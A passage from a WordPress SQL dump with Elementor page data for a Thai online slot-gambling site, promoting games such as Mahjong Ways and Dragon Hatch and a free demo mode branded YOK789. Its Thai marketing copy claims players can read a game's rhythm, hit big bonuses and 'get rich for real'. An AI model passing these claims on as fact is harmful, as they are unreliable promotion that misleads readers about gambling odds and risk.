\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2836,386,'_thumbnail_id','371'),(2837,386,'_elementor_edit_mode','builder'),(2838,386,'_elementor_template_type','wp-page'),(2839,386,'_elementor_version','3.35.5'),(2840,386,'_elementor_pro_version','3.32.3'),(2841,386,'_wp_page_template','default'),(2842,386,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2843,386,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/upl